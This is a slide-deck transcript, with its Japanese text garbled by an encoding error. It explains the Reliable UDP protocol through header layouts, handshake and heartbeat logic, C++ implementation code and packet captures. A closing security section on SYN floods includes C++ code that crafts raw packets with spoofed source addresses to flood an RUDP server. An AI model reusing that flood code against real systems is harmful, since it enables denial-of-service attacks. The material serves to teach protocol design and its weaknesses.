  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  ௨৴ෆೳঢ়ଶʹͳ͔ͬͯΒ
  ࣗಈͰ3wayϋϯυγΣΠΫΛ࠶ࢼߦͯ͠ྑ͍ճ਺

  View Slide

 42. ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  ίωΫγϣϯࣝผࢠ
  TCSͰ
  ͲͷηογϣϯΛ෮׆ͤ͞Δ͔
  Λࢦఆ͢Δͷʹ࢖͏
  ࢲ͸ؼ͖ͬͯͨ
  ໭͖ͬͯͨΫϥΠΞϯτ͸
  ιʔεΞυϨε͕มΘ͍ͬͯΔ͔΋͠Εͳ͍
  ͓લ୭΍

  View Slide

 43. SYN+ACK
  0xC0(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ ֬ೝԠ౴൪߸
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32

  View Slide

 44. 0xC0(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ ֬ೝԠ౴൪߸
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32
  negotiable parameter

  View Slide

 45. negotiable parameter
  SYN
  SYN+ACK
  ACK
  SYNͰΫϥΠΞϯτଆͷཁ๬Λ౤͛Δ
  SYN+ACKͰ࣮ࡍͷ௨৴Ͱ࢖͏΂͖஋͕ฦͬͯདྷΔ
  ͜ͷύϥϝʔλͰ
  ௨৴͍ͨ͠ͳ
  ͜ͷύϥϝʔλͰ
  զຫͯ͘͠Ε

  View Slide

 46. 0xC0(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ ֬ೝԠ౴൪߸
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32
  ௨৴ํ޲ݻ༗ͷύϥϝʔλ

  View Slide

 47. 0x10(੍ޚϑϥά) 6(ϔομαΠζ) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  RST
  0 16 32
  ηογϣϯΛऴྃ͢Δ
  ͜ͷηάϝϯτΛड͚औͬͨϗετ͸
  ҎޙͦͷηογϣϯͰ৽نͷηάϝϯτΛૹͬͯ͸͍͚ͳ͍
  (࠶ૹ͸OK)

  View Slide

 48. 0x48(੍ޚϑϥά) 6(ϔομαΠζ) γʔέϯε൪߸ ֬ೝԠ౴൪߸
  νΣοΫαϜ
  NUL
  0 16 32
  ΫϥΠΞϯτ͔Βαʔόʹରͯ͠ੜଘ֬ೝΛ͢Δ
  ੜ͖ͱΔ͔
  ੜ͖ͱΔͰ

  View Slide

 49. NUL(ੜ͖ͱΔ͔)
  ACK(ੜ͖ͱΔͰ)
  RUDPΫϥΠΞϯτ͸௨৴͢΂͖෺͕Կ΋ͳ͍࣌
  ఆظతʹNullηάϝϯτΛαʔόʹૹΔ
  NullηάϝϯτΛड͚औͬͨαʔό͸σʔλͷͳ͍ACKΛฦ͢
  NUL(ੜ͖ͱΔ͔)
  ACK(ੜ͖ͱΔͰ)

  View Slide

 50. ϋʔτϏʔτͷ΋͏1ͭͷ໾ׂ
  SYN
  ηογϣϯ։࢝ͩ
  ͜ͷϙʔτѼͷ௨৴͸
  ηογϣϯ͕ऴྃ͢Δ·Ͱ
  ͋ͷϗετʹૹΖ͏
  ಈతNAT΍ϑΝΠΞ΢Υʔϧ͸TCPͷϔομΛݟͯ
  ֎͔Βೖ͖ͬͯͯྑ͍ύέοτͷϧʔϧͷ௥Ճͱ࡟আΛߦ͏
  ͋ͷϗετ
  ͋ͷϗετ

  View Slide

 51. ξ
  ΑʔΘ͔ΒΜ͚Ͳ
  ͜ͷϙʔτѼͷ௨৴͸
  ͠͹Β͋͘ͷϗετʹૹΖ͏
  ಈతNAT΍ϑΝΠΞ΢Υʔϧ͸RUDPͷ௨৴ͷऴྃΛݕ஌Ͱ͖ͳ͍ҝ
  ͠͹Β͘௨৴͕ͳ͍ͱউखʹϧʔϧΛ࡟আ͢Δ
  ͋ͷϗετ
  ͋ͷϗετ
  ͖͔ͬ͞ΒԿ΋ඈΜͰ͜ͳ͍͚Ͳ
  ௨৴ऴΘͬͨͷ͔ͳ
  ϋʔτϏʔτͷ΋͏1ͭͷ໾ׂ

  View Slide

 52. ఆظతʹύέοτΛ౤͛߹͓͔ͬͯͳ͍ͱ
  RUDPαʔό͔Βͷ௨৴͕ΫϥΠΞϯτʹಧ͔ͳ͘ͳΔ
  ͋ͷϗετ ͲͪΒ͞·Ͱ͔͢
  ͋ͷϗετ͞Μ
  ͖ͬ͞ͷ݅ͳΜ͚ͩͲ
  ͓ฦࣄ·͔ͩͳ
  ϋʔτϏʔτͷ΋͏1ͭͷ໾ׂ

  View Slide

 53. NUL(ੜ͖ͱΔ͔)
  RUDPΫϥΠΞϯτ͸௨৴͢Δ΋ͷ͕Կ΋ແ͍৔߹
  ϋϯυγΣΠΫ࣌ʹܾΊͨ࣌ؒຖʹNULηάϝϯτΛ౤͛Δ
  NULηάϝϯτʹฦ౴͕ແ͍৔߹࠶ૹ͕ߦΘΕΔ
  ࠶ૹճ਺͕࠷େʹୡͨ͠Β௨৴ෆೳঢ়ଶͱ൑அ͢Δ
  NUL(ੜ͖ͱΔ͔)
  NUL(ੜ͖ͱΔ͔)
  ௨৴ෆೳ

  View Slide

 54. NUL(ੜ͖ͱΔ͔)
  ACK(ੜ͖ͱΔͰ)
  RUDPαʔό͸
  NULηάϝϯτλΠϚʔͷഒ଴ͬͯ΋Կ΋ඈΜͰདྷͳ͍৔߹
  ௨৴ෆೳঢ়ଶͱ൑அ͢Δ
  ɾ
  ɾ
  ɾ
  ௨৴ෆೳ

  View Slide

 55. 0x60(੍ޚϑϥά) 6+n γʔέϯε൪߸ ֬ೝԠ౴൪߸
  ड৴͚ͨ͠Ͳγʔέϯε֎ͩͬͨηάϝϯτͷ
  nݸͷγʔέϯε൪߸Λฒ΂Δ
  νΣοΫαϜ
  EAK
  0 16 32
  લͷηάϝϯτ͕ಧ͍͍ͯͳ͍͚Ͳ
  ઌʹಧ͍ͯ͠·ͬͨηάϝϯτΛ௨஌͢Δ
  TCPͰ͸
  બ୒త֬ೝԠ౴(Selective ACKnowledgment)ͱݺ͹Ε͍ͯΔ෺

  View Slide

 56. σʔλ(γʔέϯε൪߸28)
  σʔλ(γʔέϯε൪߸29)
  σʔλ(γʔέϯε൪߸30)
  σʔλ(γʔέϯε൪߸31)
  σʔλ(γʔέϯε൪߸32)
  30൪ͷηάϝϯτ͕૬खʹಧ͔ͳ͔ͬͨ৔߹Λߟ͑Δ

  View Slide

 57. ACK͚ͩͰ͸
  طʹड͚औ͍ͬͯΔ31ͱ32ͷ࠶ૹ͕ൃੜ͢Δ
  ͷड৴Ωϡʔ

  ͋Δ ͋Δ ͳ͍ ͋Δ ͋Δ ͳ͍ ͳ͍
  ֬ೝԠ౴൪߸͸29Λฦ͢͜ͱʹͳΔ

  View Slide


 58. ͋Δ ͋Δ ͳ͍ ͋Δ ͋Δ ͳ͍ ͳ͍
  29·Ͱ͸ड͚औͬͨ
  ͦΕΑΓઌ͕͋ΔͳΒ࠶ૹ͕ඞཁ
  Ͱ΋31ͱ32͸ड͚औͬͯΔ͔Β࠶ૹෆཁ
  ͜͏͍͏௨஌Λ͢Δͷ͕EAK

  View Slide

 59. σʔλ(γʔέϯε൪߸28)
  σʔλ(γʔέϯε൪߸29)
  σʔλ(γʔέϯε൪߸30)
  ηάϝϯτͷ౸ண͕஗Ε͍ͯΔ͚ͩͷՄೳੑ͕͋Δ
  γʔέϯε֎ͷηάϝϯτ͕ϋϯυγΣΠΫ࣌ʹܾΊͨ਺ʹୡ͢Δ·Ͱ͸
  EAK͸ૹΒͳ͍

  View Slide

 60. 0x42(੍ޚϑϥά) 12 γʔέϯε൪߸ͷॳظ஋ ֬ೝԠ౴൪߸
  γʔέϯε൪߸ิਖ਼ྔ ༧໿ ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  TCS
  0 16 32
  ઀ଓݩ͕มΘͬͨΫϥΠΞϯτ͕
  Ҏલͷηογϣϯͷ࠶։Λαʔόʹཁٻ͢Δͷʹ༻͍ΒΕΔ
  ίωΫγϣϯࣝผࢠʹϋϯυγΣΠΫ࣌ͱಉ͡஋Λࢦఆ͢Δ
  γʔέϯε൪߸͸ཚ਺Ͱ࡞Γ௚͠
  ݩͷγʔέϯε൪߸ͱͷࠩΛγʔέϯε൪߸ิਖ਼ྔʹॻ͍ͯૹΔ

  View Slide

 61. ௨৴Մೳ
  5$4଴ػ
  ௨৴ෆೳ
  ϋʔτϏʔτ͕
  ్੾Εͨ
  TCS͕དྷͳ͔ͬͨ
  ࠶ϋϯυγΣΠΫࣦഊ
  ऴྃ
  ࠶ϋϯυγΣΠΫ
  ੒ޭ
  TCS
  ॳظঢ়ଶ
  ϋϯυγΣΠΫ੒ޭ
  RST
  ࠶ૹճ਺্͕ݶʹୡͨ͠

  View Slide

 62. RUDPΛ஻ͬͯΈΑ͏

  View Slide

 63. void connect( const std::function< void( bool, uint32_t ) > &cb ) {
  client = true;
  send( generate_syn( false ), false, [this,this_=shared_from_this(),cb]( bool status ) {
  cb( status, self_config.connection_identifier );
  } );
  }
  buffer_ptr_t generate_syn( bool ack ) {
  buffer_ptr_t buffer( new buffer_t( 28 ) );
  (*buffer)[ 0 ] = ack ? 0xC0 : 0x80;
  (*buffer)[ 1 ] = 28;
  self_config.dump( std::next( buffer->data(), 4 ), std::next( buffer->data(), 26 ) );
  return buffer;
  }
  ΫϥΠΞϯτ͸SYNηάϝϯτΛ࡞ͬͯαʔόʹ౤͛Δ

  View Slide

 64. void receive() {
  buffer_ptr_t data( new buffer_t( buffer_size ) );
  using boost::asio::ip::udp;
  std::shared_ptr< udp::endpoint > from( new udp::endpoint() );
  socket.async_receive_from(
  boost::asio::buffer( data->data(), data->size() ),
  *from,
  [this,data,from](
  const boost::system::error_code& error,
  size_t size
  ) {
  if( likely( !error ) ) {
  data->resize( size );
  receive();
  auto &sess = sessions[ *from ];
  if( !sess && is_syn( *data ) ) {
  sess.reset( new session( io_service, socket, *from, [this](
  const boost::asio::ip::udp::endpoint &endpoint
  ) {
  auto s = sessions.find( endpoint );
  if( s != sessions.end() ) {
  session_bindings.erase( s->second->get_self_config().connection_identifier );
  sessions.erase( s );
  }
  } ) );
  session_bindings.insert( std::make_pair( sess->get_self_config().connection_identifier,
  *from ) );
  }
  αʔό͸SYNΛड͚औͬͨΒ৽͍͠ηογϣϯΛ࡞Δ

  View Slide

 65. if( !check_common_header( incoming ) ) throw invalid_packet();
  const auto header_size = (*incoming)[ 1 ];
  if( header_size > incoming->size() ) throw invalid_packet();
  if( header_size < 4 ) throw invalid_packet();
  uint16_t expected_sum;
  from_be16( std::next( incoming->data(), header_size - 2 ), expected_sum );
  to_be16( std::next( incoming->data(), header_size - 2 ), 0 );
  const auto sum = checksum( incoming->data(), std::next( incoming->data(), chk ? incoming-
  >size() : header_size ) );
  if( expected_sum != sum ) throw invalid_packet();
  const uint8_t sequence_number = (*incoming)[ 2 ];
  if( ack && !is_valid_sequence_number( (*incoming)[ 3 ] ) ) throw invalid_packet();
  bool has_data = header_size != incoming->size();
  if( syn ) {
  std::fill( receive_buffer.begin(), receive_buffer.end(), buffer_ptr_t() );
  receive_head = sequence_number;
  remote_config = session_config( std::next( incoming->data(), 4 ), std::next( incoming-
  >data(), header_size - 2 ) );
  self_config &= remote_config;
  remote_config &= self_config;
  opened = true;
  }
  if( receive_buffer[ sequence_number ] ) return; // duplicated
  receive_buffer[ sequence_number ] = incoming;
  update_receive_head( received );
  std::vector< send_cb_t > cbs;
  if( ack ) cbs = update_ack( (*incoming)[ 3 ] );
  if( syn && !ack ) send( generate_syn( true ), false, []( bool ){} );
  ड͚औͬͨSYNͷ஋͕ਖ਼ৗͰνΣοΫαϜ͕߹ͬͨΒ
  SYN+ACKΛ࡞ͬͯ

  View Slide

 66. receive_buffer[ sequence_number ] = incoming;
  update_receive_head( received );
  std::vector< send_cb_t > cbs;
  if( ack ) cbs = update_ack( (*incoming)[ 3 ] );
  if( syn && !ack ) send( generate_syn( true ), false, []( bool ){} );
  if( syn && ack ) send( generate_ack(), false, []( bool ){} );
  if( has_data || tcs ) increment_cumulative_ack_counter();
  if( eak && header_size > 6 ) {
  auto cbs_ = update_eak( std::next( incoming->begin(), 4 ), std::next( incoming->begin(),
  header_size - 2 ) );
  cbs.insert( cbs.end(), cbs_.begin(), cbs_.end() );
  resend( acknowledge_head, *std::next( incoming->begin(), header_size - 3 ) );
  }
  if( nul ) send( generate_ack(), false, []( bool ){} );
  if( out_of_sequence_count >= self_config.max_out_of_seq ) {
  send( generate_eak(), false, []( bool ) {} );
  }
  while( ready_to_send() && !pending.empty() ) {
  send( pending.front().first, true, pending.front().second );
  pending.pop();
  }
  for( auto &cb: cbs ) {
  cb( true );
  }
  ΫϥΠΞϯτʹૹ৴

  View Slide

 67. template< typename Iterator >
  void send( Iterator begin, Iterator end, const send_cb_t &cb ) {
  send( generate_ack( begin, end ), false, cb );
  }
  void send( const buffer_ptr_t &incoming, bool resend, const send_cb_t &cb ) {
  if( !incoming ) {
  cb( false );
  return;
  }
  const bool syn = (*incoming)[ 0 ] & 0x80;
  const bool rst = (*incoming)[ 0 ] & 0x10;
  const bool nul = (*incoming)[ 0 ] & 0x08;
  const bool tcs = (*incoming)[ 0 ] & 0x02;
  std::vector< send_cb_t > cbs;
  if( !resend && state != session_state::opened && !syn && !tcs ) {
  cb( false );
  return;
  }
  if( !ready_to_send() ) {
  pending.emplace( incoming, cb );
  return;
  }
  const bool ack = (*incoming)[ 0 ] & 0x40;
  if( !check_common_header( incoming ) ) throw invalid_packet();
  const auto header_size = (*incoming)[ 1 ];
  if( header_size > incoming->size() ) throw invalid_packet();
  if( header_size < 4 ) throw invalid_packet();
  bool has_data = header_size != incoming->size();
  ૹΓ͍ͨσʔλ͕͋Δͱ͖͸ACKηάϝϯτΛ࡞ͬͯ

  View Slide

 68. self_config = session_config( std::next( incoming->data(), 4 ), std::next( incoming->data(),
  header_size - 2 ) );
  state = session_state::opened;
  }
  if( rst ) {
  state = session_state::closed;
  }
  const auto sequence_number = send_head++;
  if( header_size != incoming->size() ) (*incoming)[ 0 ] = (*incoming)[ 0 ] | 0x04;
  else (*incoming)[ 0 ] = (*incoming)[ 0 ] & 0xFB;
  (*incoming)[ 2 ] = sequence_number;
  if( ack ) (*incoming)[ 3 ] = receive_head - 1;
  send_buffer[ sequence_number ] = std::make_pair( incoming, cb );
  to_be16( std::next( incoming->data(), header_size - 2 ), 0 );
  const auto sum = rudp::checksum( incoming->data(), std::next( incoming->data(), incoming-
  >size() ) );
  to_be16( std::next( incoming->data(), header_size - 2 ), sum );
  send_packet( incoming, cb );
  ++unacknowledged_packet_count;
  reset_cumulative_ack_counter();
  set_null_segment_timer();
  if( has_data || nul || rst ) {
  set_retransmission_timer( sequence_number );
  }
  for( auto &cb: cbs ) {
  cb( false );
  }
  }
  γʔέϯε൪߸ͱ֬ೝԠ౴൪߸ͱνΣοΫαϜΛ͚ͭͯ
  ΫϥΠΞϯτʹૹ৴ͯ͠࠶ૹλΠϚʔΛηοτ

  View Slide

 69. 22:52:05.891012 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 28
  0x0000: 4500 0038 20d2 4000 4011 948f c0a8 0202 E..8..@.@.......
  0x0010: c0a8 0201 1f40 1f40 0024 3bd2 801c c400 .....@.@.$;.....
  0x0020: 1040 0200 0546 03e8 01f4 03e8 03e8 0320 [email protected]..........
  0x0030: 2000 0667 ac01 c127 ...g...'
  22:52:05.891283 IP 192.168.2.1.8000 > 192.168.2.2.8000: UDP, length 28
  0x0000: 4500 0038 d813 4000 4011 dd4d c0a8 0201 E..8..@[email protected]....
  0x0010: c0a8 0202 1f40 1f40 0024 8589 c01c 80c4 .....@.@.$......
  0x0020: 1040 0200 0546 03e8 01f4 03e8 03e8 0320 [email protected]..........
  0x0030: 2000 0ffa 9071 d660 .....q.`
  22:52:05.899614 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 6
  0x0000: 4500 0022 20d4 4000 4011 94a3 c0a8 0202 E.."..@.@.......
  0x0010: c0a8 0201 1f40 1f40 000e 3bfe 4006 c580 .....@.@..;.@...
  0x0020: fa78 .x
  22:52:05.900717 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 11
  0x0000: 4500 0027 20d5 4000 4011 949d c0a8 0202 E..'..@.@.......
  0x0010: c0a8 0201 1f40 1f40 0013 3bf4 4406 c680 .....@.@..;.D...
  0x0020: cbb1 6162 6364 65 ..abcde
  22:52:05.900966 IP 192.168.2.1.8000 > 192.168.2.2.8000: UDP, length 11
  0x0000: 4500 0027 d817 4000 4011 dd5a c0a8 0201 E..'..@[email protected]....
  0x0010: c0a8 0202 1f40 1f40 0013 8578 4406 81c6 .....@[email protected]...
  3wayϋϯυγΣΠΫ
  SYN
  SYN+ACK
  ACK

  View Slide

 70. 22:52:05.900717 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 11
  0x0000: 4500 0027 20d5 4000 4011 949d c0a8 0202 E..'..@.@.......
  0x0010: c0a8 0201 1f40 1f40 0013 3bf4 4406 c680 .....@.@..;.D...
  0x0020: cbb1 6162 6364 65 ..abcde
  22:52:05.900966 IP 192.168.2.1.8000 > 192.168.2.2.8000: UDP, length 11
  0x0000: 4500 0027 d817 4000 4011 dd5a c0a8 0201 E..'..@[email protected]....
  0x0010: c0a8 0202 1f40 1f40 0013 8578 4406 81c6 .....@[email protected]...
  0x0020: 106c 6162 6364 65 .labcde
  22:52:06.409821 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 6
  0x0000: 4500 0022 21ea 4000 4011 938d c0a8 0202 E.."!.@.@.......
  0x0010: c0a8 0201 1f40 1f40 000e 3bfe 4006 c781 .....@.@..;.@...
  0x0020: f877 .w
  22:52:07.410134 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 6
  0x0000: 4500 0022 24be 4000 4011 90b9 c0a8 0202 E.."$.@.@.......
  0x0010: c0a8 0201 1f40 1f40 000e 3bfe 4806 c881 .....@.@..;.H...
  0x0020: ef77 .w
  22:52:07.410306 IP 192.168.2.1.8000 > 192.168.2.2.8000: UDP, length 6
  0x0000: 4500 0022 dc94 4000 4011 d8e2 c0a8 0201 E.."..@.@.......
  0x0010: c0a8 0202 1f40 1f40 000e 8573 4006 82c8 .....@[email protected]@...
  0x0020: 3d31 =1
  22:52:08.410689 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 6
  σʔλͷૹ৴ͱ֬ೝԠ౴
  σʔλૹ৴
  σʔλૹ৴
  ACK

  View Slide

 71. 0x0010: c0a8 0201 1f40 1f40 000e 3bfe 4006 c781 .....@.@..;.@...
  0x0020: f877 .w
  22:52:07.410134 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 6
  0x0000: 4500 0022 24be 4000 4011 90b9 c0a8 0202 E.."$.@.@.......
  0x0010: c0a8 0201 1f40 1f40 000e 3bfe 4806 c881 .....@.@..;.H...
  0x0020: ef77 .w
  22:52:07.410306 IP 192.168.2.1.8000 > 192.168.2.2.8000: UDP, length 6
  0x0000: 4500 0022 dc94 4000 4011 d8e2 c0a8 0201 E.."..@.@.......
  0x0010: c0a8 0202 1f40 1f40 000e 8573 4006 82c8 .....@[email protected]@...
  0x0020: 3d31 =1
  22:52:08.410689 IP 192.168.2.2.8000 > 192.168.2.1.8000: UDP, length 6
  0x0000: 4500 0022 288b 4000 4011 8cec c0a8 0202 E.."(.@.@.......
  0x0010: c0a8 0201 1f40 1f40 000e 3bfe 4806 c982 .....@.@..;.H...
  0x0020: ee76 .v
  22:52:08.410773 IP 192.168.2.1.8000 > 192.168.2.2.8000: UDP, length 6
  0x0000: 4500 0022 dd11 4000 4011 d865 c0a8 0201 E.."..@[email protected]....
  0x0010: c0a8 0202 1f40 1f40 000e 8573 4006 83c9 .....@[email protected]@...
  0x0020: 3c30 <0
  ϋʔτϏʔτ
  NUL
  ACK
  NUL
  ACK

  View Slide

 72. ηΩϡϦςΟ

  View Slide

 73. ೝূ΍҉߸Խ͸RUDPΑΓ্ͷϨΠϠʔͰߦ͏ࣄ͕ͩ
  ௨৴͕ߦ͑ͳ͘ͳΔྨͷ߈ܸʹରͯ͠͸
  ଱ੑΛ࣋ͭඞཁ͕͋Δ

  View Slide

 74. TCPʹ͓͚ΔSYN flood߈ܸ
  SYN
  SYN+ACK
  SYN͚ͩ౤͛ͯ
  Ҏޙͷ௨৴Λ
  શ͘ߦΘͳ͍
  ϝϞϦ֬อ
  SYNΛड͚औͬͨαʔό͸
  Ҏޙͷ௨৴ͷҝʹϝϞϦΛ֬อ͢Δ

  View Slide

 75. TCPʹ͓͚ΔSYN flood߈ܸ
  SYN
  SYN+ACK
  ઀ଓݩΛِ૷ͯ͠େྔͷSYNΛ౤͛Δ
  αʔό͸େྔͷηογϣϯΛ࡞Γ
  ΍͕ͯηογϣϯ͕࡞Εͳ͘ͳΔ
  SYN
  SYN
  SYN
  ϝϞϦ֬อ
  SYN+ACK
  ϝϞϦ֬อ
  SYN+ACK
  ϝϞϦ֬อ
  SYN+ACK
  ϝϞϦ֬อ
  ߈ܸऀ͸ϨεϙϯεΛݟΕͳ͍͕
  ϝϞϦ͸֬อ͞Ε͍ͯΔͷͰ
  ໰୊ͳ͍

  View Slide

 76. SYN
  SYN+ACK(ϋογϡ஋)
  ACK(ϋογϡ஋)
  64ඵຖʹมΘΔ஋ͱ
  ઀ଓݩͱ઀ଓઌΛ
  ϋογϡʹ͔͚ͯ
  γʔέϯε൪߸Λ࡞Δ
  SYN cookie
  ϝϞϦ֬อ ϋογϡΛ֬ೝ
  αʔό͚͕ͩ࡞ΕΔϋογϡ஋Ͱγʔέϯε൪߸Λ࡞Δ
  ਖ਼͍͠ϋογϡ஋ͷγʔέϯε൪߸ͷ֬ೝԠ౴͕ฦ͖ͬͯͨ࣌ʹϦιʔεΛ֬อ
  ઀ଓݩΛ࠮শ͍ͯ͠Δ߈ܸऀ͸ACKΛฦͤͳ͍

  View Slide

 77. RUDPͷ৔߹
  0x80(੍ޚϑϥά) 28(ϔομαΠζ) γʔέϯε൪߸ͷॳظ஋ 0
  όʔδϣϯ ༧໿
  ֬ೝԠ౴ແ͠Ͱૹͬͯ
  ྑ͍ηάϝϯτ਺
  Φϓγϣϯϑϥά ༧໿
  ηάϝϯτͷ࠷େαΠζ
  (όΠτ)
  ࠶ૹλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ྦྷੵ֬ೝԠ౴λΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  NullηάϝϯτλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  సૹঢ়ଶλΠϚʔͷ଴ͪ࣌ؒ
  (ϛϦඵ)
  ࠷େ࠶ૹճ਺
  ֬ೝԠ౴Λ
  ཷΊࠐΜͰྑ͍࠷େ਺
  EACKΛૹΔલʹཷΊࠐΉ΂͖
  γʔέϯε֎ͷηάϝϯτ਺
  ௨৴ΛఘΊΔલʹ
  ࣗಈϦηοτΛͯ͠ྑ͍ճ਺
  ίωΫγϣϯࣝผࢠ্Ґ16bit
  ίωΫγϣϯࣝผࢠԼҐ16bit νΣοΫαϜ
  0 16 32
  SYNʹ৭ʑಥͬࠐΈ͗ͯ͢SYN࣌ͷϝϞϦ֬อෆՄආ
  SYN cookie͸࢖͑ͳ͍

  View Slide

 78. RUDPʹ͓͚ΔSYN flood߈ܸ
  ϋʔτϏʔτͷ࠷େ௕Ͱ2௨ΓͷৼΔ෣͍Λ͢Δ
  TCPಉ༷αʔόͷϝϞϦΛ࢖͍੾ͬͯ
  ηογϣϯ͕࡞Εͳ͘ͳΔ
  ϋʔτϏʔτͷִ͕ؒे෼ʹ௕͍৔߹
  SYN
  SYN+ACK
  SYN
  SYN
  SYN
  ϝϞϦ֬อ
  SYN+ACK
  ϝϞϦ֬อ
  SYN+ACK
  ϝϞϦ֬อ
  SYN+ACK
  ϝϞϦ֬อ

  View Slide

 79. std::array< uint8_t, 28 > syn{
  0x80, 0x1c, 0x21, 0x00, 0x10, 0x40, 0x02, 0x00, 0x05, 0x46, 0x03, 0xe8,
  0x01, 0xf4, 0x75, 0x30, 0x03, 0xe8, 0x03, 0x20, 0x20, 0x00, 0x56, 0x13,
  0x1e, 0x7a, 0x30, 0xbb
  };
  for( unsigned int seq = 0; seq != 65536u * 256u; ++seq ) {
  ip_header->saddr = htonl((10<<24)|seq);
  ip_header->daddr = htonl((192<<24)|(168<<16)|(2<<8)|1);
  ip_header->check = 0;
  std::array< uint8_t, total_pseudo_packet_size > pseudo;
  std::fill( pseudo.begin(), pseudo.end(), 0 );
  auto pseudo_header = reinterpret_cast< pseudo_header_t* >(
  std::next( pseudo.data(), pseudo_ip_offset )
  );
  pseudo_header->saddr = ip_header->saddr;
  pseudo_header->daddr = ip_header->daddr;
  pseudo_header->protocol = ip_header->protocol;
  pseudo_header->tot_len = htons( udp_header_size + rudp_header_size );
  auto udp_header = reinterpret_cast< udphdr* >(
  std::next( buf.data(), udp_offset )
  );

  View Slide

 80. auto udp_header = reinterpret_cast< udphdr* >(
  std::next( buf.data(), udp_offset )
  );
  udp_header->uh_sport = htons( port );
  udp_header->uh_dport = htons( port );
